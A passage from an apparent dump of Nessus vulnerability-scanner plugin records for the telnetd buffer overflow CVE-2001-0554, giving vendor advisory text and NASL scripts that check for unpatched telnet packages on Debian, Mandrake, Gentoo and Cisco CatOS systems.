<scut@nb.in-berlin.de>, and announced to\nbugtraq on Jul 18 2001. At that time, netkit-telnet versions after\n0.14 were not believed to be vulnerable.\n\nOn Aug 10 2001, zen-parse posted an advisory based on the same\nproblem, for all netkit-telnet versions below 0.17.\n\nMore details can be found on\nhttp://online.securityfocus.com/archive/1/203000. As Debian uses the\n`telnetd' user to run in.telnetd, this is not a remote root compromise\non Debian systems; however, the user `telnetd' can be compromised.\n\nWe strongly advise you update your telnetd package to the versions\nlisted below.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://online.securityfocus.com/archive/1/203000\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2001/dsa-070\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected netkit-telnet package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:netkit-telnet\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2001/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/07/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"telnet\", reference:\"0.16-4potato.2\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"telnetd\", reference:\"0.16-4potato.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:44:30", "description": "The telnet daemon contained in the netkit-telnet-ssl_0.16.3-1 package\n in the 'stable' (potato) distribution of Debian GNU/Linux is\n vulnerable to an exploitable overflow in its output handling. The\n original bug was found by <scut@nb.in-berlin.de>, and announced to\n bugtraq on Jul 18 2001. At that time, netkit-telnet versions after\n 0.14 were not believed to be vulnerable.\n\nOn Aug 10 2001, zen-parse posted an advisory based on the same\nproblem, for all netkit-telnet versions below 0.17.\n\nMore details can be found on SecurityFocus. As Debian uses the\n'telnetd' user to run in.telnetd, this is not a remote root compromise\non Debian systems; the 'telnetd' user can be compromised.\n\nWe strongly advise you update your netkit-telnet-ssl packages to the\nversions listed below.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-075-1 : netkit-telnet-ssl - remote exploit", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "p-cpe:/a:debian:debian_linux:netkit-telnet-ssl"], "id": "DEBIAN_DSA-075.NASL", "href": "https://www.tenable.com/plugins/nessus/14912", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-075. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14912);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2001-0554\");\n script_xref(name:\"DSA\", value:\"075\");\n\n script_name(english:\"Debian DSA-075-1 : netkit-telnet-ssl - remote exploit\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The telnet daemon contained in the netkit-telnet-ssl_0.16.3-1 package\n in the 'stable' (potato) distribution of Debian GNU/Linux is\n vulnerable to an exploitable overflow in its output handling. The\n original bug was found by <scut@nb.in-berlin.de>, and announced to\n bugtraq on Jul 18 2001. At that time, netkit-telnet versions after\n 0.14 were not believed to be vulnerable.\n\nOn Aug 10 2001, zen-parse posted an advisory based on the same\nproblem, for all netkit-telnet versions below 0.17.\n\nMore details can be found on SecurityFocus. As Debian uses the\n'telnetd' user to run in.telnetd, this is not a remote root compromise\non Debian systems; the 'telnetd' user can be compromised.\n\nWe strongly advise you update your netkit-telnet-ssl packages to the\nversions listed below.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://online.securityfocus.com/archive/1/203000\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2001/dsa-075\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected netkit-telnet-ssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:netkit-telnet-ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2001/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/07/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"ssltelnet\", reference:\"0.16.3-1.1\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"telnet-ssl\", reference:\"0.16.3-1.1\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"telnetd-ssl\", reference:\"0.16.3-1.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T00:51:47", "description": "Some Cisco Catalyst switches, running certain CatOS based software\nreleases, have a vulnerability wherein a buffer overflow in the telnet\noption handling can cause the telnet daemon to crash and result in a\nswitch reload. This vulnerability can be exploited to initiate a \ndenial of service (DoS) attack.\n\nThis vulnerability is documented as Cisco bug ID CSCdw19195.", "edition": 23, "published": "2002-06-05T00:00:00", "title": "Cisco CatOS Telnet Option Handling Overflow (CSCdw19195)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:cisco:ios"], "id": "CSCDW19195.NASL", "href": "https://www.tenable.com/plugins/nessus/10986", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: domain no longer exists)\n# Added link to the Bugtraq message archive\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(10986);\n script_version(\"1.24\");\n script_cve_id(\"CVE-2001-0554\");\n script_bugtraq_id(3064);\n\n script_name(english:\"Cisco CatOS Telnet Option Handling Overflow (CSCdw19195)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\" );\n script_set_attribute(attribute:\"description\", value:\n\"Some Cisco Catalyst switches, running certain CatOS based software\nreleases, have a vulnerability wherein a buffer overflow in the telnet\noption handling can cause the telnet daemon to crash and result in a\nswitch reload. This vulnerability can be exploited to initiate a \ndenial of service (DoS) attack.\n\nThis vulnerability is documented as Cisco bug ID CSCdw19195.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.nessus.org/u?c67eaadb\n\nReference : http://online.securityfocus.com/archive/1/252833\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/06/05\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2001/07/18\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value: \"cpe:/o:cisco:ios\");\n script_end_attributes();\n\n script_summary(english:\"Uses SNMP to determine if a flaw is present\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CISCO\");\n script_dependencie(\"snmp_sysDesc.nasl\", \"snmp_cisco_type.nasl\");\n script_require_keys(\"SNMP/community\", \"SNMP/sysDesc\", \"CISCO/model\");\n exit(0);\n}\n\n# The code starts here\n\nok=0;\nos = get_kb_item(\"SNMP/sysDesc\"); if(!os)exit(0);\nhardware = get_kb_item(\"CISCO/model\"); if(!hardware)exit(0);\n\n\n# Check for the required hardware...\n#----------------------------------------------------------------\n# catalyst8500\nif(ereg(string:hardware, pattern:\"^catalyst85[0-9][0-9]$\"))ok=1;\n\n# catalyst4kGateway\nif(ereg(string:hardware, pattern:\"^catalyst4kGateway$\"))ok=1;\n\n# catalyst3[0-9][0-9][0-9][^0-9]*\nif(ereg(string:hardware, pattern:\"^catalyst3[0-9][0-9][0-9][^0-9]*$\"))ok=1;\n\n# catalyst29[0-9][0-9][^0-9]*\nif(ereg(string:hardware, pattern:\"^catalyst29[0-9][0-9][^0-9]*$\"))ok=1;\n\n# catalyst19[0-9][0-9][^0-9]*\nif(ereg(string:hardware, pattern:\"^catalyst19[0-9][0-9][^0-9]*$\"))ok=1;\n\nif(!ok)exit(0);\nok = 0;\n\n\n# Check for the required operating system...\n#----------------------------------------------------------------\n# Is this CatOS ?\nif(!egrep(pattern:\".*Cisco Catalyst Operating System.*\", string:os))exit(0);\n# 4.5\nif(egrep(string:os, pattern:\"(4\\.5\\(([0-9]|1[0-2])\\)|4\\.5),\"))ok=1;\n\n# 5.5\nif(egrep(string:os, pattern:\"(5\\.5\\(([0-9]|1[0-2])\\)|5\\.5),\"))ok=1;\n\n# 6.3\nif(egrep(string:os, pattern:\"(6\\.3\\([0-3]\\)|6\\.3),\"))ok=1;\n\n# 7.1\nif(egrep(string:os, pattern:\"(7\\.1\\([0-1]\\)|7\\.1),\"))ok=1;\n\n\n#----------------------------------------------\n\nif(ok)security_hole(port:161, proto:\"udp\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:16", "description": "A buffer overflow exists in the telnet portion of Kerberos that could\nprovide root access to local users. MDKSA-2001:068 provided a similar\nfix to the normal telnet packages, but the Kerberized equivalent was\nnot updated previously.", "edition": 24, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : krb5 (MDKSA-2001:093)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "modified": "2004-07-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:krb5-workstation", "p-cpe:/a:mandriva:linux:krb5-server", "p-cpe:/a:mandriva:linux:ftp-server-krb5", "p-cpe:/a:mandriva:linux:krb5-devel", "p-cpe:/a:mandriva:linux:ftp-client-krb5", "cpe:/o:mandrakesoft:mandrake_linux:8.1", "p-cpe:/a:mandriva:linux:telnet-client-krb5", "p-cpe:/a:mandriva:linux:telnet-server-krb5", "p-cpe:/a:mandriva:linux:krb5-libs"], "id": "MANDRAKE_MDKSA-2001-093.NASL", "href": "https://www.tenable.com/plugins/nessus/13906", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2001:093. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13906);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2001-0554\");\n script_xref(name:\"MDKSA\", value:\"2001:093\");\n\n script_name(english:\"Mandrake Linux Security Advisory : krb5 (MDKSA-2001:093)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow exists in the telnet portion of Kerberos that could\nprovide root access to local users. MDKSA-2001:068 provided a similar\nfix to the normal telnet packages, but the Kerberized equivalent was\nnot updated previously.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ftp-client-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ftp-server-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet-client-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet-server-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2001/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"ftp-client-krb5-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"ftp-server-krb5-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"krb5-devel-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"krb5-libs-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"krb5-server-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"krb5-workstation-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"telnet-client-krb5-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"telnet-server-krb5-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:51:52", "description": "The remote host is affected by the vulnerability described in GLSA-200410-03\n(NetKit-telnetd: buffer overflows in telnet and telnetd)\n\n A possible buffer overflow exists in the parsing of option strings by the\n telnet daemon, where proper bounds checking is not applied when writing to\n a buffer. Additionaly, another possible buffer overflow has been found by\n Josh Martin in the handling of the environment variable HOME.\n \nImpact :\n\n A remote attacker sending a specially crafted options string to the telnet\n daemon could be able to run arbitrary code with the privileges of the user\n running the telnet daemon, usually root. Furthermore, an attacker could\n make use of an overlong HOME variable to cause a buffer overflow in the\n telnet client, potentially leading to the local execution of arbitrary\n code.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2004-10-06T00:00:00", "title": "GLSA-200410-03 : NetKit-telnetd: buffer overflows in telnet and telnetd", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "modified": "2004-10-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:netkit-telnetd", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200410-03.NASL", "href": "https://www.tenable.com/plugins/nessus/15424", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200410-03.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15424);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2001-0554\");\n script_xref(name:\"GLSA\", value:\"200410-03\");\n\n script_name(english:\"GLSA-200410-03 : NetKit-telnetd: buffer overflows in telnet and telnetd\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200410-03\n(NetKit-telnetd: buffer overflows in telnet and telnetd)\n\n A possible buffer overflow exists in the parsing of option strings by the\n telnet daemon, where proper bounds checking is not applied when writing to\n a buffer. Additionaly, another possible buffer overflow has been found by\n Josh Martin in the handling of the environment variable HOME.\n \nImpact :\n\n A remote attacker sending a specially crafted options string to the telnet\n daemon could be able to run arbitrary code with the privileges of the user\n running the telnet daemon, usually root. Furthermore, an attacker could\n make use of an overlong HOME variable to cause a buffer overflow in the\n telnet client, potentially leading to the local execution of arbitrary\n code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=264846\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=264846\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200410-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All NetKit-telnetd users should upgrade to the latest version:\n # emerge sync\n # emerge -pv '>=net-misc/netkit-telnetd-0.17-r4'\n # emerge '>=net-misc/netkit-telnetd-0.17-r4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:netkit-telnetd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/netkit-telnetd\", unaffected:make_list(\"ge 0.17-r4\"), vulnerable:make_list(\"le 0.17-r3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"NetKit-telnetd\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:15", "description": "A buffer overflow exists in telnet which could provide root access to\nlocal users.", "edition": 24, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : telnet (MDKSA-2001:068)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "modified": "2004-07-31T00:00:00", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:7.2", "p-cpe:/a:mandriva:linux:telnet-server", "cpe:/o:mandrakesoft:mandrake_linux:8.0", "cpe:/o:mandrakesoft:mandrake_linux:7.1", "p-cpe:/a:mandriva:linux:telnet"], "id": "MANDRAKE_MDKSA-2001-068.NASL", "href": "https://www.tenable.com/plugins/nessus/13883", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2001:068. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13883);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2001-0554\");\n script_xref(name:\"MDKSA\", value:\"2001:068\");\n\n script_name(english:\"Mandrake Linux Security Advisory : telnet (MDKSA-2001:068)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow exists in telnet which could provide root access to\nlocal users.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected telnet and / or telnet-server packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2001/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"telnet-0.16-4.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"telnet-server-0.16-4.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"telnet-0.17-7.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"telnet-server-0.17-7.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"telnet-0.17-7.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"telnet-server-0.17-7.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:33:40", "description": "The Telnet server does not return an expected number of replies when\nit receives a long sequence of 'Are You There' commands. This\nprobably means it overflows one of its internal buffers and crashes. \nThis could likely lead to arbitrary code execution.", "edition": 23, "published": "2001-07-24T00:00:00", "title": "BSD Based telnetd telrcv Function Remote Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "TESO_TELNET.NASL", "href": "https://www.tenable.com/plugins/nessus/10709", "sourceData": "#\n# Test TESO in.telnetd buffer overflow\n#\n# Copyright (c) 2001 Pavel Kankovsky, DCIT s.r.o. <kan@dcit.cz>\n# Permission to copy, modify, and redistribute this script under\n# the terms of the GNU General Public License is hereby granted.\n#\n# The kudos for an idea of counting of AYT replies should go\n# to Sebastian <scut@nb.in-berlin.de> and Noam Rathaus\n# 